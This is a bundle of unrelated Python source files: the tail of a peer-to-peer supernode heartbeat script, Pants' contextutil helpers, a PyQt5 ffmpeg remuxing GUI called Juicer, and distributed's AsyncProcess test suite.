                        print('------adding new node ----------')
                        #TODO
                        handleFiles(addr[0])
            except socket.timeout as e:
                print "Error caught during super Node Assignment :",e
            ## ACK Listening END
def heartBeat():
    """Periodically check liveness of each child node marked alive.

    For every live child, listens on local port 12121 (10s timeout) for a
    connection; a timeout is treated as "no ping". After a pass that checked
    at least one node, sleeps 5 minutes before the next round.

    NOTE(review): the socket is bound to myIPAddr, and the accepted
    connection is never verified to come from `child.IPAddr` — any
    connecting peer counts as that child's heartbeat; confirm intended.
    """
    print 'Inside HeartBeat'
    isCheck = False
    while True:
        # TCP_IP = "10.196.700.181"
        # Iterate over a copy of the keys: other threads mutate childNodes.
        for x in list(childNodes):
            child = childNodes[x]
            if(child.liveStatus):
                print "Child IP : "+child.IPAddr
                TCP_IP = child.IPAddr
                TCP_PORT = 12121
                BUFFER_SIZE = 5096
                tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
                tcpsock.bind((myIPAddr, TCP_PORT))
                tcpsock.settimeout(10)
                isCheck = True
                try:
                    tcpsock.listen(5)
                    print "Checking for Node Alive "+ TCP_IP
                    (conn, (ip, port)) = tcpsock.accept()
                    msg = conn.recv(5096)
                except socket.timeout as e:
                    # child.liveStatus = False
                    # print "Node is Dead AF : " + TCP_IP
                    tcpsock.close()
                    continue
                print "Node is Alive :) " + TCP_IP
                tcpsock.close()
        if isCheck:
            time.sleep(300)
            isCheck = False
# def SupernodeToSupernode():
# supernodeIPList = ['10.196.7.181']
if __name__ == "__main__":
    myIP()
    # One thread per long-running service loop; none of them ever return,
    # so the joins below block the main thread forever.
    threads = []
    setSuper = threading.Thread(target=setSuperNodes, name='setSuper')
    # Run forever to Assign Super node to Client
    t1 = threading.Thread(target=assignSuperNode, name='t1')
    # Run forever to check File Server Live Status (Alive/Dead)
    hbt = threading.Thread(target=heartBeat, name='heartBeat')
    reqH = threading.Thread(target=reqHandler, name='reqH')
    getU = threading.Thread(target=getUpdates, name='getU')
    threads.extend([setSuper, t1, hbt, reqH, getU])
    # Start/join orders preserved from the original startup sequence.
    for service in (setSuper, getU, t1, hbt, reqH):
        service.start()
    for service in (getU, setSuper, t1, hbt, reqH):
        service.join()
|
contextutil.py | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import shutil
import sys
import tempfile
import termios
import threading
import zipfile
from contextlib import contextmanager
from pathlib import Path
from queue import Queue
from socketserver import TCPServer
from typing import IO, Any, Callable, Iterator, Mapping, Optional, Tuple, Type, Union
from colors import green
from pants.util.dirutil import safe_delete
class InvalidZipPath(ValueError):
    """Raised for an empty or otherwise invalid zip file path."""
@contextmanager
def environment_as(**kwargs: Optional[str]) -> Iterator[None]:
    """Temporarily override environment variables, for example:

    with environment_as(PYTHONPATH='foo:bar:baz',
                        PYTHON='/usr/bin/python2.7'):
        subprocess.Popen(foo).wait()

    A value of None removes the variable for the duration of the context.
    The previous values (including absence) are restored on exit.
    """
    saved: dict = {}

    def _apply(name: str, value: Optional[str]) -> None:
        # None means "ensure the variable is absent".
        if value is None:
            if name in os.environ:
                del os.environ[name]
        else:
            os.environ[name] = value

    for name, value in kwargs.items():
        saved[name] = os.environ.get(name)
        _apply(name, value)
    try:
        yield
    finally:
        for name, value in saved.items():
            _apply(name, value)
def _purge_env() -> None:
    """Remove every variable from the process environment.

    N.B. `del` is required (it calls os.unsetenv under the hood) so that
    subprocess invokes and other C-level consumers of the environment see the
    removal — rebinding os.environ to an empty dict would not propagate.
    See https://docs.python.org/3/library/os.html#os.unsetenv for more info.
    """
    # Snapshot the keys first: deleting while iterating the live view is an error.
    for name in list(os.environ.keys()):
        del os.environ[name]
def _restore_env(env: Mapping[str, str]) -> None:
    """Install every name/value pair from `env` into os.environ."""
    for name, value in env.items():
        os.environ[name] = value
@contextmanager
def hermetic_environment_as(**kwargs: Optional[str]) -> Iterator[None]:
    """Run the body with ONLY the supplied variables in the environment.

    Snapshots the current environment, empties it, applies `kwargs`, and
    restores the snapshot on exit.
    """
    snapshot = os.environ.copy()
    _purge_env()
    try:
        with environment_as(**kwargs):
            yield
    finally:
        # Clear anything the body set before restoring the snapshot.
        _purge_env()
        _restore_env(snapshot)
@contextmanager
def argv_as(args: Tuple[str, ...]) -> Iterator[None]:
    """Run the body with sys.argv replaced by `args`, restoring it on exit."""
    saved_argv = sys.argv
    try:
        sys.argv = list(args)
        yield
    finally:
        sys.argv = saved_argv
@contextmanager
def _stdio_stream_as(src_fd: int, dst_fd: int, dst_sys_attribute: str, mode: str) -> Iterator[None]:
    """Replace the given dst_fd and attribute on `sys` with an open handle to the given src_fd.

    A src_fd of -1 is a sentinel meaning "redirect to /dev/null". On exit the
    original OS-level fd is dup2'd back and the original `sys` attribute is
    restored.
    """
    if src_fd == -1:
        src = open("/dev/null", mode)
        src_fd = src.fileno()
    # Capture the python and os level file handles.
    old_dst = getattr(sys, dst_sys_attribute)
    old_dst_fd = os.dup(dst_fd)
    if src_fd != dst_fd:
        os.dup2(src_fd, dst_fd)
    # Open up a new file handle to temporarily replace the python-level io object, then yield.
    new_dst = os.fdopen(dst_fd, mode)
    # Record tty-ness up front: it decides how to drain buffered output later.
    is_atty = new_dst.isatty()
    setattr(sys, dst_sys_attribute, new_dst)
    try:
        yield
    finally:
        try:
            if is_atty:
                # Let pending output reach the terminal before switching back.
                termios.tcdrain(dst_fd)
            else:
                new_dst.flush()
            new_dst.close()
        except BaseException:
            # Best-effort flush/close: restoring the original fds below
            # matters more than a failed drain.
            pass
        # Restore the python and os level file handles.
        os.dup2(old_dst_fd, dst_fd)
        setattr(sys, dst_sys_attribute, old_dst)
@contextmanager
def stdio_as(stdout_fd: int, stderr_fd: int, stdin_fd: int) -> Iterator[None]:
    """Redirect sys.{stdout, stderr, stdin} to alternate file descriptors.

    As a special case, if a given destination fd is `-1`, we will replace it with an open file handle
    to `/dev/null`.

    NB: If the filehandles for sys.{stdout, stderr, stdin} have previously been closed, it's
    possible that the OS has repurposed fds `0, 1, 2` to represent other files or sockets. It's
    impossible for this method to locate all python objects which refer to those fds, so it's up
    to the caller to guarantee that `0, 1, 2` are safe to replace.

    The streams expect unicode. To write and read bytes, access their buffer, e.g. `stdin.buffer.read()`.
    """
    # Nest the three single-stream redirections; exiting unwinds in reverse
    # (stderr, stdout, stdin), restoring each fd and sys attribute.
    with _stdio_stream_as(stdin_fd, 0, "stdin", "r"), _stdio_stream_as(
        stdout_fd, 1, "stdout", "w"
    ), _stdio_stream_as(stderr_fd, 2, "stderr", "w"):
        yield
@contextmanager
def temporary_dir(
    root_dir: Optional[str] = None,
    cleanup: bool = True,
    suffix: Optional[str] = None,
    permissions: Optional[int] = None,
    prefix: Optional[str] = tempfile.template,
) -> Iterator[str]:
    """A with-context that creates a temporary directory and yields its path.

    :API: public

    :param root_dir: The parent directory to create the temporary directory in.
    :param cleanup: Whether to delete the directory (recursively) on exit.
    :param suffix: Optional suffix for the directory name.
    :param permissions: If provided, sets the directory permissions to this mode.
    :param prefix: Prefix for the directory name.
    """
    tmp_path = tempfile.mkdtemp(dir=root_dir, suffix=suffix, prefix=prefix)
    try:
        if permissions is not None:
            os.chmod(tmp_path, permissions)
        yield tmp_path
    finally:
        if cleanup:
            # ignore_errors: best-effort removal; the dir may already be gone.
            shutil.rmtree(tmp_path, ignore_errors=True)
@contextmanager
def temporary_file_path(
    root_dir: Optional[str] = None,
    cleanup: bool = True,
    suffix: Optional[str] = None,
    permissions: Optional[int] = None,
) -> Iterator[str]:
    """A with-context that creates a temporary file and yields its path.

    :API: public

    :param root_dir: The parent directory to create the temporary file in.
    :param cleanup: Whether to delete the temporary file on exit.
    :param suffix: Optional suffix for the file name.
    :param permissions: If provided, sets the file permissions to this mode.
    """
    with temporary_file(root_dir, cleanup=cleanup, suffix=suffix, permissions=permissions) as tmp:
        # Close the handle immediately; callers only get the path.
        tmp.close()
        yield tmp.name
@contextmanager
def temporary_file(
    root_dir: Optional[str] = None,
    cleanup: bool = True,
    suffix: Optional[str] = None,
    permissions: Optional[int] = None,
    binary_mode: bool = True,
) -> Iterator[IO]:
    """A with-context that creates a temporary file and yields a writeable handle to it.

    :param root_dir: The parent directory to create the temporary file in.
    :param cleanup: Whether to delete the temporary file on exit.
    :param suffix: If specified, the file name ends with this suffix (no dot is
        inserted — include one at the start of the suffix if needed).
        See :py:class:`tempfile.NamedTemporaryFile`.
    :param permissions: If provided, sets the file to use these permissions.
    :param binary_mode: Whether the file is opened in binary or text mode.
    """
    open_mode = "w+b" if binary_mode else "w+"  # tempfile's default is 'w+b'
    # delete=False: lifecycle is controlled by `cleanup`, not by handle close.
    with tempfile.NamedTemporaryFile(suffix=suffix, dir=root_dir, delete=False, mode=open_mode) as handle:
        try:
            if permissions is not None:
                os.chmod(handle.name, permissions)
            yield handle
        finally:
            if cleanup:
                safe_delete(handle.name)
@contextmanager
def overwrite_file_content(
    file_path: Union[str, Path],
    temporary_content: Optional[Union[bytes, str, Callable[[bytes], bytes]]] = None,
) -> Iterator[None]:
    """Temporarily replace a file's content, restoring the original on exit.

    :param file_path: Path of the file to reset after the body runs.
    :param temporary_content: Bytes/str to write, or a function mapping the
        current content (bytes) to the temporary content. None leaves the
        file untouched while the body runs.
    """
    target = Path(file_path)
    original_bytes = target.read_bytes()
    try:
        if temporary_content is not None:
            if callable(temporary_content):
                replacement = temporary_content(original_bytes)
            elif isinstance(temporary_content, bytes):
                replacement = temporary_content
            else:
                replacement = temporary_content.encode()
            target.write_bytes(replacement)
        yield
    finally:
        # Always restore the content captured on entry.
        target.write_bytes(original_bytes)
@contextmanager
def pushd(directory: str) -> Iterator[str]:
    """A with-context that encapsulates pushd/popd: chdir into `directory`
    for the body, then chdir back to the previous working directory."""
    previous_cwd = os.getcwd()
    os.chdir(directory)
    try:
        yield directory
    finally:
        os.chdir(previous_cwd)
@contextmanager
def open_zip(path_or_file: Union[str, Any], *args, **kwargs) -> Iterator[zipfile.ZipFile]:
    """A with-context for zip files; the zip is always closed on exit.

    Passes through *args and **kwargs to zipfile.ZipFile.

    :API: public

    :param path_or_file: Full path to zip file.
    :param args: Any extra args accepted by `zipfile.ZipFile`.
    :param kwargs: Any extra keyword args accepted by `zipfile.ZipFile`.
    :raises: `InvalidZipPath` if path_or_file is invalid.
    :raises: `zipfile.BadZipfile` if zipfile.ZipFile cannot open a zip at path_or_file.
    """
    if not path_or_file:
        raise InvalidZipPath(f"Invalid zip location: {path_or_file}")
    # Large archives by default unless the caller opted out.
    kwargs.setdefault("allowZip64", True)
    try:
        archive = zipfile.ZipFile(path_or_file, *args, **kwargs)
    except zipfile.BadZipfile as bze:
        # Use the realpath in order to follow symlinks back to the problem source file.
        raise zipfile.BadZipfile(f"Bad Zipfile {os.path.realpath(path_or_file)}: {bze}")
    try:
        yield archive
    finally:
        archive.close()
@contextmanager
def maybe_profiled(profile_path: Optional[str]) -> Iterator[None]:
    """A profiling context manager.

    :param profile_path: Where to write cProfile stats. A falsy value makes
        the whole context a no-op.
    """
    if not profile_path:
        yield
        return

    # Imported lazily: profiling is the rare path.
    import cProfile

    profiler = cProfile.Profile()
    try:
        profiler.enable()
        yield
    finally:
        profiler.disable()
        profiler.dump_stats(profile_path)
        view_cmd = green(
            "gprof2dot -f pstats {path} | dot -Tpng -o {path}.png && open {path}.png".format(
                path=profile_path
            )
        )
        logging.getLogger().info(
            f"Dumped profile data to: {profile_path}\nUse e.g. {view_cmd} to render and view."
        )
@contextmanager
def http_server(handler_class: Type) -> Iterator[int]:
    """Serve `handler_class` on an ephemeral port in a daemon thread.

    Yields the bound port number; on exit, signals the server loop to stop
    and joins the thread.
    """
    port_queue: "Queue[int]" = Queue()
    shutdown_queue: "Queue[bool]" = Queue()

    def _serve() -> None:
        server = TCPServer(("", 0), handler_class)
        # Short request timeout so the shutdown flag is polled frequently.
        server.timeout = 0.1
        server_port = server.server_address[1]
        port_queue.put(server_port)
        while shutdown_queue.empty():
            server.handle_request()

    worker = threading.Thread(target=_serve)
    worker.daemon = True
    worker.start()
    try:
        yield port_queue.get(block=True)
    finally:
        shutdown_queue.put(True)
        worker.join()
|
juicer.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# ffmpeg -i an.mp4 -i vn.mp4 -map_metadata 0 -c copy map.mp4
# ffmpeg -i "E:\TV\美国\看见 See.S01.HDR.2160p.WEB.h265-NiXON[rartv]\see.s01e01.hdr.2160p.web.h265-nixon.mkv" -c copy D:\va.mp4
# ffmpeg -i "E:\TV\美国\看见 See.S01.HDR.2160p.WEB.h265-NiXON[rartv]\see.s01e01.hdr.2160p.web.h265-nixon.mkv" -vn -c copy D:\vn.mp4
# ffmpeg -i "E:\TV\美国\看见 See.S01.HDR.2160p.WEB.h265-NiXON[rartv]\see.s01e01.hdr.2160p.web.h265-nixon.mkv" -an -c copy D:\an.mp4
# pyinstaller -w -c -D --icon=juicer_icon.ico juicer.py
#
import os,sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import qdarkstyle
from pathlib import Path
import threading
import subprocess
import time
class Juicer(QWidget):
    """Minimal PyQt5 front-end around ffmpeg for remuxing video files.

    The user picks one or more source files and an output directory; each
    file is remuxed (`ffmpeg -c copy`, no re-encode) into the chosen
    container on a background thread.
    """

    def __init__(self):
        super().__init__()
        self.initUI()
        self.show()

    def initUI(self):
        """Build the window: source list, output dir, log pane, controls."""
        # Size the window to half the available screen area.
        self.desktop = QApplication.primaryScreen()
        self.screenRect = self.desktop.availableGeometry()
        self.height = self.screenRect.height()
        self.width = self.screenRect.width()
        self.resize(int(self.width*0.5), int(self.height*0.5))
        # Window title and icon.
        self.setWindowTitle(' Juicer 提取器')
        self.setWindowIcon(QIcon('img/juicer_icon.ico'))
        # Grid layout: row 1 source files, row 2 output dir,
        # row 3 status log, row 4 container combo + extract button.
        grid = QGridLayout()
        self.pathLine = QTextEdit(readOnly=True)
        self.pathLine.setPlaceholderText("视频源文件")
        grid.addWidget(self.pathLine, 1, 0, 1, 1)
        self.selectButton = QPushButton("选择文件", self)
        self.selectButton.setToolTip('选择MKV视频源文件')
        self.selectButton.clicked.connect(self.openFileNamesDialog)
        self.selectButton.setFixedWidth(160)
        grid.addWidget(self.selectButton, 1, 1)
        self.dirLine = QLineEdit(readOnly=True)
        self.dirLine.setPlaceholderText("输出文件夹")
        grid.addWidget(self.dirLine, 2, 0)
        outdirButton = QPushButton("输出目录", self)
        outdirButton.clicked.connect(self.saveFileDialog)
        outdirButton.setToolTip('存储视频的文件夹')
        grid.addWidget(outdirButton, 2, 1)
        self.extrLine = QTextEdit(readOnly=True)
        self.extrLine.setPlaceholderText("等待执行")
        grid.addWidget(self.extrLine, 3, 0, 1, 1)
        self.extractorButton = QPushButton("提取", self)
        self.extractorButton.clicked.connect(self.extractor)
        grid.addWidget(self.extractorButton, 4, 1)
        # Defaults: plain MP4 remux, no extra mux flags.
        self.suffix = '.mp4'
        self.mux = ''
        self.cmdsuffixCombo = QComboBox(self)
        self.cmdsuffixCombo.setFixedWidth(100)
        self.cmdsuffixCombo.addItem("MP4")
        self.cmdsuffixCombo.addItem("MOV")
        self.cmdsuffixCombo.addItem("TrueHD")
        self.cmdsuffixCombo.activated[str].connect(self.onChangedCmdsuffix)
        grid.addWidget(self.cmdsuffixCombo, 4, 0,
                       alignment=Qt.AlignRight)
        self.setLayout(grid)

    def onChangedCmdsuffix(self, cmdsuffix):
        """Map the container combo selection onto output suffix / mux flags.

        NOTE(review): "TrueHD" only sets self.mux and keeps the previous
        suffix; MP4/MOV never reset self.mux — confirm this asymmetry is
        intended.
        """
        if cmdsuffix == "MP4":
            self.suffix = '.mp4'
            print ('mp4')
        if cmdsuffix == "MOV":
            self.suffix = '.mov'
        if cmdsuffix == "TrueHD":
            self.mux = ' -strict experimental '

    def suffixFilename(self, state):
        """Checkbox handler (not wired in the current UI): toggle .mov/.mp4."""
        if state == Qt.Checked:
            self.suffix = '.mov'
        if state == Qt.Unchecked:
            self.suffix = '.mp4'

    def muxCmd(self, state2):
        """Checkbox handler (not wired in the current UI): toggle the
        `-strict experimental` mux flag."""
        if state2 == Qt.Checked:
            self.mux = ' -strict experimental '
        if state2 == Qt.Unchecked:
            self.mux = ''

    def openFileNamesDialog(self):
        """Let the user pick source videos; echo the list in the path box."""
        options = QFileDialog.Options()
        options |= QFileDialog.DontUseNativeDialog
        self.inputFiles, _ = QFileDialog.getOpenFileNames(self,"QFileDialog.getOpenFileNames()", "","视频文件 (*.mkv *.mp4)", options=options)
        if self.inputFiles:
            self.filelist = ",".join(self.inputFiles)
            self.pathLine.setPlainText(str(self.filelist))

    def saveFileDialog(self):
        """Let the user pick the output directory; echo it in the dir box."""
        self.outputFileDir = QFileDialog.getExistingDirectory(self,"选择目录","")
        if self.outputFileDir:
            self.dirLine.setText(str(self.outputFileDir))

    def extractor(self):
        """Launch one ffmpeg remux thread per selected source file."""
        try:
            for inputListFile in self.inputFiles:
                self.inputFileName = Path(inputListFile).name
                self.inputFileSuffix = Path(inputListFile).suffix
                inputFilePath = str(inputListFile).replace('\\','/')
                self.outputFilePath = str(self.outputFileDir) + '/' + str(self.inputFileName)
                # Strip the source suffix; the chosen container suffix is appended below.
                outputFilePathSuffix = str(self.outputFilePath).replace(self.inputFileSuffix,'')
                self.extractorButton.setDisabled(True)
                statusLine = self.outputFilePath + ' 正在执行封装工作,请稍等…… '
                self.extrLine.append(statusLine)
                ffmpeg = os.getcwd().replace('\\','/') + '/bin/ffmpeg.exe'
                ffmpegcmd = (ffmpeg + " -y -i " + '"' + inputFilePath +'"' + " -c copy " + self.mux + '"' + outputFilePathSuffix + self.suffix + '"')
                # BUG FIX: `args` must be a tuple. The original passed
                # `args=(ffmpegcmd)` — a bare string — which Thread iterated
                # character-by-character, so the worker was never called
                # with the full command.
                thread = threading.Thread(
                    target=self.extractorThread, args=(ffmpegcmd,))
                thread.start()
                QApplication.processEvents()
        except AttributeError:
            # Raised when no files / output dir have been selected yet.
            self.extrLine.append(' 请检查,文件路径 ')

    def extractorThread(self, ffmpegcmd):
        """Worker thread: run the assembled ffmpeg command and wait for it."""
        ffmpegcmdrun = subprocess.Popen(
            ffmpegcmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        ffmpegcmdrun.communicate()
        # TODO(review): the extract button is disabled in extractor() but
        # never re-enabled after the run completes.
if __name__ == '__main__':
    # Qt entry point: create the application, apply the dark stylesheet,
    # show the main window, and hand control to the Qt event loop.
    app = QApplication(sys.argv)
    app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
    # app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyside2'))
    # QFontDatabase.addApplicationFont('Font\SourceHanSansSC-Normal.otf')
    # app.setFont('Font\SourceHanSansSC-Normal.otf')
    ex = Juicer()
    sys.exit(app.exec_())
|
test_asyncprocess.py | from __future__ import print_function, division, absolute_import
from datetime import timedelta
import gc
import os
import signal
import sys
import threading
from time import sleep
import weakref
import pytest
from tornado import gen
from tornado.locks import Event
from distributed.metrics import time
from distributed.process import AsyncProcess
from distributed.utils import mp_context
from distributed.utils_test import gen_test, pristine_loop, nodebug
def feed(in_q, out_q):
    """Relay one item: block up to 5s for an object on in_q, put it on out_q."""
    out_q.put(in_q.get(timeout=5))
def exit(q):
    """Child-process target: exit with the status code read from `q`.

    (Intentionally shadows the builtin `exit`; callers reference it by name.)
    """
    code = q.get()
    sys.exit(code)
def exit_now(rc=0):
    """Child-process target: exit immediately with status `rc` (default 0)."""
    sys.exit(rc)
def exit_with_signal(signum):
    """Child-process target: die from signal `signum`.

    Restores default SIGINT handling first (presumably because the spawning
    framework overrides it — confirm), then repeatedly raises the signal at
    our own pid until delivery terminates the process.
    """
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    while True:
        os.kill(os.getpid(), signum)
        sleep(0.01)
def wait():
    """Child-process target: sleep-spin forever until killed externally."""
    while True:
        sleep(0.01)
def threads_info(q):
    """Report thread state onto `q`: first the live-thread count, then the
    current thread's name."""
    for item in (len(threading.enumerate()), threading.current_thread().name):
        q.put(item)
@nodebug
@gen_test()
def test_simple():
    """Exercise the full AsyncProcess lifecycle.

    Covers: pre-start state, daemon flag handling, join() timeout behaviour,
    normal exit through the feed() child, exit code, repeated join(), and
    that the wrapper and its underlying process are garbage-collectable.
    """
    to_child = mp_context.Queue()
    from_child = mp_context.Queue()

    proc = AsyncProcess(target=feed, args=(to_child, from_child))
    assert not proc.is_alive()
    assert proc.pid is None
    assert proc.exitcode is None
    assert not proc.daemon
    proc.daemon = True
    assert proc.daemon

    # Weakrefs to check the wrapper and the wrapped process get collected.
    wr1 = weakref.ref(proc)
    wr2 = weakref.ref(proc._process)

    # join() before start()
    with pytest.raises(AssertionError):
        yield proc.join()

    yield proc.start()
    assert proc.is_alive()
    assert proc.pid is not None
    assert proc.exitcode is None

    # join() with a timeout while the child is still waiting on its queue.
    t1 = time()
    yield proc.join(timeout=0.02)
    dt = time() - t1
    assert 0.2 >= dt >= 0.01
    assert proc.is_alive()
    assert proc.pid is not None
    assert proc.exitcode is None

    # setting daemon attribute after start()
    with pytest.raises(AssertionError):
        proc.daemon = False

    to_child.put(5)
    assert from_child.get() == 5

    # child should be stopping now
    t1 = time()
    yield proc.join(timeout=10)
    dt = time() - t1
    assert dt <= 1.0
    assert not proc.is_alive()
    assert proc.pid is not None
    assert proc.exitcode == 0

    # join() again
    t1 = time()
    yield proc.join()
    dt = time() - t1
    assert dt <= 0.6

    del proc
    gc.collect()
    start = time()
    while wr1() is not None and time() < start + 1:
        # Perhaps the GIL switched before _watch_process() exit,
        # help it a little
        sleep(0.001)
        gc.collect()
    if wr1() is not None:
        # Help diagnosing
        from types import FrameType

        p = wr1()
        if p is not None:
            rc = sys.getrefcount(p)
            refs = gc.get_referrers(p)
            del p
            print("refs to proc:", rc, refs)
            frames = [r for r in refs if isinstance(r, FrameType)]
            for i, f in enumerate(frames):
                print("frames #%d:" % i,
                      f.f_code.co_name, f.f_code.co_filename, sorted(f.f_locals))
        pytest.fail("AsyncProcess should have been destroyed")
    t1 = time()
    while wr2() is not None:
        yield gen.sleep(0.01)
        gc.collect()
    dt = time() - t1
    assert dt < 2.0
@gen_test()
def test_exitcode():
    """The child's sys.exit(code) is reflected in proc.exitcode."""
    q = mp_context.Queue()

    proc = AsyncProcess(target=exit, kwargs={'q': q})
    proc.daemon = True
    assert not proc.is_alive()
    assert proc.exitcode is None

    yield proc.start()
    assert proc.is_alive()
    assert proc.exitcode is None

    # The child blocks on q.get(); sending 5 makes it sys.exit(5).
    q.put(5)
    yield proc.join(timeout=3.0)
    assert not proc.is_alive()
    assert proc.exitcode == 5
@pytest.mark.skipif(os.name == 'nt', reason="POSIX only")
@gen_test()
def test_signal():
    """Death by signal yields a negative exitcode (-signum), both when the
    child kills itself (SIGINT) and when we kill it (SIGTERM)."""
    proc = AsyncProcess(target=exit_with_signal, args=(signal.SIGINT,))
    proc.daemon = True
    assert not proc.is_alive()
    assert proc.exitcode is None

    yield proc.start()
    yield proc.join(timeout=3.0)

    assert not proc.is_alive()
    # Can be 255 with forkserver, see https://bugs.python.org/issue30589
    assert proc.exitcode in (-signal.SIGINT, 255)

    proc = AsyncProcess(target=wait)
    yield proc.start()
    os.kill(proc.pid, signal.SIGTERM)
    yield proc.join(timeout=3.0)

    assert not proc.is_alive()
    assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
def test_terminate():
    """terminate() stops a spinning child; exitcode reflects SIGTERM."""
    proc = AsyncProcess(target=wait)
    proc.daemon = True
    yield proc.start()
    yield proc.terminate()

    yield proc.join(timeout=3.0)
    assert not proc.is_alive()
    assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
def test_close():
    """After close(), start()/terminate()/join() all raise ValueError;
    a second close() is a no-op."""
    proc = AsyncProcess(target=exit_now)
    proc.close()
    with pytest.raises(ValueError):
        yield proc.start()

    proc = AsyncProcess(target=exit_now)
    yield proc.start()
    proc.close()
    with pytest.raises(ValueError):
        yield proc.terminate()

    proc = AsyncProcess(target=exit_now)
    yield proc.start()
    yield proc.join()
    proc.close()
    with pytest.raises(ValueError):
        yield proc.join()
    proc.close()
@gen_test()
def test_exit_callback():
    """The exit callback fires after the child stops, for both a normal exit
    and a terminate()."""
    to_child = mp_context.Queue()
    from_child = mp_context.Queue()
    evt = Event()

    # Coroutine callback: must run (and set the event) after process exit.
    @gen.coroutine
    def on_stop(_proc):
        assert _proc is proc
        yield gen.moment
        evt.set()

    # Normal process exit
    proc = AsyncProcess(target=feed, args=(to_child, from_child))
    evt.clear()
    proc.set_exit_callback(on_stop)
    proc.daemon = True

    yield proc.start()
    yield gen.sleep(0.05)
    assert proc.is_alive()
    assert not evt.is_set()

    # feed() forwards None and then the child exits.
    to_child.put(None)
    yield evt.wait(timedelta(seconds=3))
    assert evt.is_set()
    assert not proc.is_alive()

    # Process terminated
    proc = AsyncProcess(target=wait)
    evt.clear()
    proc.set_exit_callback(on_stop)
    proc.daemon = True

    yield proc.start()
    yield gen.sleep(0.05)
    assert proc.is_alive()
    assert not evt.is_set()

    yield proc.terminate()
    yield evt.wait(timedelta(seconds=3))
    assert evt.is_set()
@gen_test()
def test_child_main_thread():
    """
    The main thread in the child should be called "MainThread".
    """
    q = mp_context.Queue()
    proc = AsyncProcess(target=threads_info, args=(q,))
    yield proc.start()
    yield proc.join()
    n_threads = q.get()
    main_name = q.get()
    # Two threads expected -- presumably the main thread plus an AsyncProcess
    # helper thread in the child; confirm against AsyncProcess internals.
    assert n_threads == 2
    assert main_name == "MainThread"
    # Explicitly release the queue's pipe ends to avoid fd leakage into
    # later tests (see test_num_fds).
    q.close()
    q._reader.close()
    q._writer.close()
@pytest.mark.skipif(sys.platform.startswith('win'),
                    reason="num_fds not supported on windows")
@gen_test()
def test_num_fds():
    """Starting and joining an AsyncProcess must not leak file descriptors."""
    psutil = pytest.importorskip('psutil')
    # Warm up -- the first process creation may allocate long-lived fds,
    # so measure the baseline only after one full start/join cycle.
    proc = AsyncProcess(target=exit_now)
    proc.daemon = True
    yield proc.start()
    yield proc.join()

    p = psutil.Process()
    before = p.num_fds()

    proc = AsyncProcess(target=exit_now)
    proc.daemon = True
    yield proc.start()
    yield proc.join()
    assert not proc.is_alive()
    assert proc.exitcode == 0

    # fd cleanup can lag process exit; poll with a 10 s deadline.
    start = time()
    while p.num_fds() > before:
        yield gen.sleep(0.1)
        print("fds:", before, p.num_fds())
        assert time() < start + 10
@gen_test()
def test_terminate_after_stop():
    """terminate() on a child that has already exited must not raise."""
    proc = AsyncProcess(target=sleep, args=(0,))
    yield proc.start()
    yield gen.sleep(0.1)  # give the child time to finish on its own
    yield proc.terminate()
def _worker_process(worker_ready, child_pipe):
    """Child body for the parent-exit teardown test; should never run to the end.

    Signals readiness, then sleeps; the parent's death is expected to get this
    process killed before the sleep elapses.
    """
    # child_pipe is the write-side of the children_alive pipe held by the
    # test process. When this _worker_process exits, this file descriptor should
    # have no references remaining anywhere and be closed by the kernel. The
    # test will therefore be able to tell that this process has exited by
    # reading children_alive.

    # Signal to parent process that this process has started and made it this
    # far. This should cause the parent to exit rapidly after this statement.
    worker_ready.set()
    # The parent exiting should cause this process to os._exit from a monitor
    # thread. This sleep should never return.
    shorter_timeout = 2.5  # timeout shorter than that in the spawning test.
    sleep(shorter_timeout)
    # Unreachable if functioning correctly.
    child_pipe.send("child should have exited by now")
def _parent_process(child_pipe):
    """ Simulate starting an AsyncProcess and then dying.
    The child_alive pipe is held open for as long as the child is alive, and can
    be used to determine if it exited correctly. """
    def parent_process_coroutine():
        worker_ready = mp_context.Event()
        worker = AsyncProcess(target=_worker_process,
                              args=(worker_ready, child_pipe))
        yield worker.start()
        # Wait for the child process to have started.
        worker_ready.wait()
        # Exit immediately, without doing any process teardown (including atexit
        # and 'finally:' blocks) as if by SIGKILL. This should cause
        # worker_process to also exit.
        os._exit(255)

    # pristine_loop is a test-suite helper -- presumably yields a fresh IOLoop.
    with pristine_loop() as loop:
        try:
            loop.run_sync(gen.coroutine(parent_process_coroutine), timeout=10)
        finally:
            loop.stop()
            # os._exit above skips this entirely; reaching it means the
            # coroutine returned/failed without exiting the process.
            raise RuntimeError("this should be unreachable due to os._exit")
def test_asyncprocess_child_teardown_on_parent_exit():
    """ Check that a child process started by AsyncProcess exits if its parent
    exits.
    The motivation is to ensure that if an AsyncProcess is created and the
    creator process dies unexpectedly (e.g, via Out-of-memory SIGKILL), the
    child process and resources held by it should not be leaked.
    The child should monitor its parent and exit promptly if the parent exits.

    [test process] -> [parent using AsyncProcess (dies)] -> [worker process]
               \                                               /
                \_________ <-- child_pipe <-- ________________/
    """
    # When child_pipe is closed, the children_alive pipe unblocks.
    children_alive, child_pipe = mp_context.Pipe(duplex=False)
    try:
        parent = mp_context.Process(target=_parent_process, args=(child_pipe,))
        parent.start()
        # Close our reference to child_pipe so that the child has the only one.
        child_pipe.close()
        # Wait for the parent to exit. By the time join returns, the child
        # process is orphaned, and should be in the process of exiting by
        # itself.
        parent.join()
        # By the time we reach here, the parent has exited. The parent only
        # exits when the child is ready to enter the sleep, so all of the slow
        # things (process startup, etc) should have happened by now, even on a
        # busy system. A short timeout should therefore be appropriate.
        short_timeout = 5.
        # Poll is used to allow other tests to proceed after this one in case of
        # test failure.
        try:
            readable = children_alive.poll(short_timeout)
        except EnvironmentError:
            # Windows can raise BrokenPipeError. EnvironmentError is caught for
            # Python2/3 portability.
            assert sys.platform.startswith('win'), "should only raise on windows"
            # Broken pipe implies closed, which is readable.
            readable = True
